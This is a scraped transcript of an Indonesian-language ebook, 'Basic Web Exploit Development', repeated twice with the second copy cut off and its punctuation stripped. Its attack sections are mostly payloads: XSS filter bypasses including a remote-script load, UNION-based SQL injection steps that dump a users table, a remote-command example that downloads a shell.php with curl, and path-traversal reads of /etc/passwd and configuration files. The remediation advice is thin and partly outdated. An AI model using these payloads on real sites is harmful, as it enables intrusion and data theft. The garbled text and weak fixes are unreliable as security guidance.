basic web exploit development

35

Upload: devilscream-noob

Post on 15-Jul-2015

80.389 views

Category:

Internet


4 download

TRANSCRIPT

Page 1: Basic Web Exploit Development

Diterbitkan Oleh

Ebook ini dibuat sebagai media pembelajaran Segala macam materi yang ada pada ebookini berdasarkan pengalaman pribadi penulis

Ebook ini bebas untuk disebarluaskan dengan syarat tidak mengubah nama penulis dan isimateri yang ada didalamnya

CreditsDevilScreaM (devilscreamnewbie-securityorid)

Daftar Isi

0x01 - PengenalanApa itu Web Exploit Jenis-Jenis Web Exploit Teknik Mencari Web Exploit ~ Analysis Code ~ Google Search Engine

0x02 - Cross Site ScriptingApa itu Cross Site Scripting Tipe Cross Site Scripting ~ Non Persistent ~ Persistent Stored Kode yang Menimbulkan Celah Injeksi Cross Site Scripting Injeksi Cross Site Scripting dengan Bypass Menutup Celah Cross Site Scripting

0x03 - SQL InjectionApa itu SQL Injection Kode yang Menimbulkan Celah Injeksi SQL Injection ~ Menghitung Jumlah Tables ~ Melihat Tables ~ Melihat Column ~ Melihat Data pada Column Menutup Celah SQL Injection

0x04 - Remote Code ExecutionApa itu Remote Code Execution Kode yang Menimbulkan Celah Injeksi Remote Code Execution Menutup Celah Remote Code Execution

0x05 - Local File DownloadApa itu Local File Download Kode yang Menimbulkan Celah Injeksi Local File Download Menutup Celah Local File Download

0x06 - Cross Site Request ForgeryApa itu Cross Site Request Forgery Kode yang Menimbulkan Celah Injeksi Cross Site Request Forgery ~ Kode Exploit Cross Site Request Forgery Menutup Cross Site Request Forgery

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim ~ Contoh Keterangan Exploit Mengirim Exploit ke 1337day Mengirim Exploit ke Exploit-DB Mengirim Exploit ke Packet Storm Security

0x01 - Pengenalan

Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb

Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery

Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu

1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak

2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork

0x02 - Cross Site Scripting

Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css

Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost

0x02 - Cross Site Scripting

Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini

Non Persistent

Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web

Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18

Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter

Persistent Stored

Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 2: Basic Web Exploit Development

Daftar Isi

0x01 - PengenalanApa itu Web Exploit Jenis-Jenis Web Exploit Teknik Mencari Web Exploit ~ Analysis Code ~ Google Search Engine

0x02 - Cross Site ScriptingApa itu Cross Site Scripting Tipe Cross Site Scripting ~ Non Persistent ~ Persistent Stored Kode yang Menimbulkan Celah Injeksi Cross Site Scripting Injeksi Cross Site Scripting dengan Bypass Menutup Celah Cross Site Scripting

0x03 - SQL InjectionApa itu SQL Injection Kode yang Menimbulkan Celah Injeksi SQL Injection ~ Menghitung Jumlah Tables ~ Melihat Tables ~ Melihat Column ~ Melihat Data pada Column Menutup Celah SQL Injection

0x04 - Remote Code ExecutionApa itu Remote Code Execution Kode yang Menimbulkan Celah Injeksi Remote Code Execution Menutup Celah Remote Code Execution

0x05 - Local File DownloadApa itu Local File Download Kode yang Menimbulkan Celah Injeksi Local File Download Menutup Celah Local File Download

0x06 - Cross Site Request ForgeryApa itu Cross Site Request Forgery Kode yang Menimbulkan Celah Injeksi Cross Site Request Forgery ~ Kode Exploit Cross Site Request Forgery Menutup Cross Site Request Forgery

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim ~ Contoh Keterangan Exploit Mengirim Exploit ke 1337day Mengirim Exploit ke Exploit-DB Mengirim Exploit ke Packet Storm Security

0x01 - Pengenalan

Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb

Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery

Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu

1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak

2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork

0x02 - Cross Site Scripting

Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css

Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost

0x02 - Cross Site Scripting

Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini

Non Persistent

Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web

Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18

Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter

Persistent Stored

Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

